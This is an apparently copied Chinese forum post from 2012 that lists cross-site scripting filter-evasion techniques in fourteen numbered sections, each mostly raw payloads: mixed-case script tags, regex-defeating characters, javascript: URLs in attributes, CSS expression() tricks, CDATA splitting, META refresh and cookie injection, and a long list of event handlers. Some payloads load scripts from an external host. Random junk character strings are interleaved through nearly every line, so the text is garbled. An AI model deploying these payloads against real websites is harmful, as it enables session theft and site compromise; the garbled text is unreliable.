1. 改变字符大小写% A7 j' L! L y
% j: h& L$ [" a, ?& Y
; t/ c" a9 j N# y4 s
: A c# a. B. M4 {. ^ <sCript>alert(‘d’)</scRipT>7 U6 z9 T/ a; |. W, `+ v6 D3 @
: c9 \! p7 X$ D0 y7 X+ r2. 利用多加一些其它字符来规避Regular Expression的检查# I1 `( O* n7 m* T& A% k( P
5 `/ U* Y3 e7 `3 X8 F: g <<script>alert(‘c’)//<</script>% y! N# m5 K% c8 T) G7 G
. J3 x) Y. e6 g% R <SCRIPT a=">" SRC="t.js"></SCRIPT>
. ], m1 C4 X( l2 m
) K& c% s4 K6 m7 V }/ E; G5 B0 g% k <SCRIPT =">" SRC="t.js"></SCRIPT>) d$ f* m4 h' q5 A" a0 J0 s
) q' E7 @, i* w% W
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>: h8 i1 Z% E& @' E% a8 Y
, r7 Q! Z2 P m2 X <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
: o) J, N/ t% ?0 |4 G' D, [# T$ {: g& I0 w5 A3 X
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
( i$ [! g) P) P& i% p6 {( G6 s* N3 N: }& Z5 s+ ]0 m
<SCRIPT a=">’>" SRC="t.js"></SCRIPT> x, R$ a$ t* o* k, V( `1 ^' N% G. g
+ N I- B, _! [& Y4 h" j0 V
3. 以其它扩展名取代.js7 J, C. G* P4 r/ k% f/ n
2 g: q0 x- y& @" G <script src="bad.jpg"></script>4 _1 n1 W# C: a2 b5 ^ T8 j
, b( g1 D+ y2 Z1 ?3 k( X0 ^
4. 将Javascript写在CSS档里9 N& g( J. ]( \# f
- Q! R% T- _: F+ q% S <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">- o6 ? `( E) p7 _- e/ S) e
3 H! m. ]: S5 j& Q G/ S example:
: R" k e: i. }; ^) ^, p) Y% M( p+ }1 J* }9 S6 E
body {$ U+ [! k; t# w
+ W) `! F9 ?% C8 w0 x/ } background-image: url(‘javascript:alert("XSS");’)
. Z7 ?% k8 W& ?2 C: o" c7 B: C$ a0 s5 e1 Z! }
}& A- ?* D/ {& P9 P5 x% ?& `' u' M
2 J1 _! f4 a2 U
5. 在script的tag里加入一些其它字符
8 y, n2 P J' `+ _, z( c4 e7 x5 Z: z1 G
<SCRIPT/SRC="t.js"></SCRIPT>0 j' k5 S! w0 `+ ]
5 U- ^5 M4 h h: O <SCRIPT/anyword SRC="t.js"></SCRIPT>
+ a+ h% l4 ]) K7 Z/ X0 {
; k& j) Y# `! c# w' \* K$ A6. 使用tab或是new line来规避
2 d0 W6 f$ T& k) d; u* g L K; r
4 k' v" ^1 G3 N ]6 s% A" [ <img src="jav ascr ipt:alert(‘XSS3′)">
# @) q* w, x9 m6 O5 _1 [
h# g1 U% Y8 p" x- ]* U <img src="jav ascr ipt:alert(‘XSS3′)">
6 B. c1 @# {! ~: @
$ x, R: r% U i, { <IMG SRC="jav ascript:alert(‘XSS’);">
. Z+ R2 m Z* ?6 e' D8 @! ]) v8 e5 O6 O- ` n6 b
-> tag' A' S( t; z7 b7 U9 T$ E E% {( c
1 T" b9 |, q( K2 {1 N& f! J
-> new line
0 |. F' A' R# R9 \% a
+ q* `" X: F% \; b& _5 p7. 使用"\"来规避3 ^+ A9 ^* z/ w: N& Y
! l8 ~- e, E1 H0 @7 b1 C$ u
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
/ {' U# _( Q+ j
- a- o5 z9 @; h4 c <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>. M. ^. @8 i# f( o; B) D
/ C* C& Y/ C6 p' b# B <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
- |9 ~. u& Z+ J1 _& m5 {! |
; b' Z/ r& B; a3 E0 ~ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
* Q" H4 W( ]3 H7 S
( c5 x& D2 I- X( X% i& j5 \% d8 S <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>$ E" n4 [ [; K( z
% i# `5 M2 G4 x* b. R
8. 使用Hex encode来规避(也可能会把";"拿掉): t2 d: |) j- h7 Z# `: m
% F0 w4 \' {; ? D! A
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 s; x' q, E' k8 P4 t& B* f9 k5 i5 Z {- T; l& ?
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">) d1 n! b" C+ y0 b N0 t0 i
( {2 Y' p, ]- _' p- L; e7 h
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
! y4 `$ X! I0 ?+ \# {. m* t. B
k% T+ f" f5 }4 A7 ^1 N. K 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">2 ?7 [3 ^. b" u# L1 N) Y5 r) p7 l
* X0 B w2 L1 A% s) l, K/ x% b4 u
9. script in HTML tag6 k) [( \+ x8 S
9 H9 ?6 }) D6 o. W- }, r <body onload=」alert(‘onload’)」>+ A- C/ M% s4 ]* s! ?3 w. a
, A9 ?( n9 c, B$ u) [( b x6 x
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
8 [, Y' \; o. o8 o, V- I! g# e, F$ a) C6 |: t
10. 在swf里含有xss的code9 O( r+ }' h$ {+ q' H' U
7 O. d( M' G/ F9 _; d <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> ]5 a' D1 l* J2 R7 y; r
& f8 w8 E0 k3 R2 H
11. 利用CDATA将xss的code拆开,再组合起来。; B3 C& P2 D8 u3 r6 A
9 d2 U u8 S8 d! N6 a( M
<XML ID=I><X><C>
0 `# T: @9 m, d; w/ l! i( L
- ^% X1 @9 N6 h( C/ p <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
" A1 t% [% y1 d4 a l' ?! R) Y
/ i' {% R, A/ j2 ~4 Z </C></X>& T1 e% t# {! x8 w" A
- N3 l# L0 u- N' {) C6 j8 }
</xml>& U0 y3 }9 ^% k9 r. n- X; x N1 ^% k
. x9 J8 g5 q3 L* e
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>! k* a9 N, d% n( A+ o- J$ x
/ K a1 w) r2 w9 `( x9 D; n2 } <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
$ V8 v8 E. m( M/ p8 x( R
* S" v2 Q, [( z8 o, a: } <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>4 c% P% z- k) z; n z J$ B
% O, e- o R, o* V12. 利用HTML+TIME。. E9 v6 `3 J1 `3 b/ T
5 X2 j* G# I* N: d/ ]9 Q$ a <HTML><BODY>: P! P$ o/ g8 C6 ], s6 w3 l' o
* t7 S y) l9 p6 q. n, O \
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
5 V! D3 `4 U# W" p
/ e0 L/ o5 Z$ a; s& x; C <?import namespace="t" implementation="#default#time2">
3 Y, E! F* {: Q3 W( \ J+ O9 ]: l! x9 I
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
# M; T* z Z, f; Z! u) w8 k7 ^
</BODY></HTML>& ~6 ]3 N' V# j) I5 D
! F0 o1 f/ z/ k6 Z13. 透过META写入Cookie。, B, t9 e3 Z6 n* m9 ]9 r2 s4 a: c1 E
# H7 c" G+ I4 C2 X8 y <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
. `2 i( o8 G( `* |( U: A# p. [. y9 j; `1 x+ z: C/ m6 |8 ?
14. javascript in src , href , url
; q' J# `) G8 N+ T% x- R4 z
3 A# M( u5 ], d9 @& v <IFRAME SRC=javascript:alert(’13′)></IFRAME>
9 k! V+ }/ s3 U: m, z1 c& p, a) E( k- U$ o
<img src="javascript:alert(‘XSS3′)">2 U o6 N, V, X1 e$ h0 [( S
7 n- b+ {9 a( x, H8 ]. W2 V' O* A
<IMG DYNSRC="javascript:alert(‘XSS20′)">
1 C& l0 f* o, W6 z$ T. T$ q
: }$ ?: W3 d: ?! F2 T <IMG LOWSRC="javascript:alert(‘XSS21′)">. C5 a% ?% C/ H
3 f% }3 m) E3 y) y* f1 _9 t. t$ R8 g9 L
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">5 B$ z* |3 |- V% f
; t" A3 [' Y/ i! u% X
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
2 C& T1 K p. T. E
+ u6 p- L$ D/ G r <TABLE BACKGROUND="javascript:alert(‘XSS29′)">; ~- ^$ l+ q) @$ h7 u6 }( p
" b9 ?* Y: {- G; I0 O <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">" X3 k% e2 z5 o' ?. R3 j2 k: v
" X# Q r# ]' G3 ~1 c4 N. h
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");} |% \7 s0 O: w v7 a# m) j: H
~- F& P5 k+ n j4 e </STYLE><A CLASS=XSS></A>
2 o. A1 H# T- s. w ?7 H+ B ?
+ a, C# v9 S& b, [: m <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET># G4 x. Z& i# @0 j) J5 Y4 ]
! P- U8 U( {7 y, @- A- n
|
发表于 2012-12-31 09:59:28
收藏
支持
反对